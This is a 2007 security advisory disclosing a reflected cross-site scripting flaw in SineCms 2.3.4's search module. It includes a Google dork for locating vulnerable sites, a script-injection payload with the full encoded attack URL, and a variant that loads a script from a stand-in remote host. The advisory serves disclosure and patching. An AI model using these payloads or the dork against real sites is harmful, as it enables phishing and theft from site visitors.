SecurityvulnsSECURITYVULNS:DOC:16872SineCMS
. . .
._ | . .| . .;/
[)|(]\|[ )(](.| \.net
| ._|
"SineCms Version 2.3.4 - Non-Persistent XSS Vulnerability"
by Nexus
1) Infos
Date : 2007-04-26 (ISO 8601)
Product : SineCms
Version : 2.3.4 (last), prior versions may also be affected
Vendor : http://sourceforge.net/projects/sine - http://www.sinecms.net
Vendor Status : 2007-04-26 - Informed!
Description : SineCms is a management software for international communication
based on hypertext.
Google Dork : "SineCms Version: 2.3.4"
Source : nexus
E-mail : nexus[at]playhack[dot]net
Team : Playhack.net Security
2) Security Issues
The core module for Search engine is affected by a Non-Persistent Cross-Site Scripting
vulnerability.
The source in "mods/Core/result.php" doesn't properly sanitize the input of the user
and just get the submitted text without any previous check on the content.
The affected variable is $_GET['stringa'], as a matter of fact if we try to insert a
string like:
"><script>alert(1);</script>
The website will retrieve an url like:
host/path/mods.php?mods=Core&page=result&stringa=%22%3E%3Cscript%3Ealert%281
%29%3C%2Fscript%3E&campo=all&criterio=tutte&ordine=decrescente
And it executes the JavaScript code.
The script makes only a check on apex, that can be simply avoided executing for
example a remote script like
"><script src=http://host.com/script.js></script>
It's easy to guess that this kind of vulnerability can be used to accomplish some
Phishing attacks, or whatever can be disfruted from an XSS flaw.
3) Patch
Edit the core source code and sanitize properly the inputted data.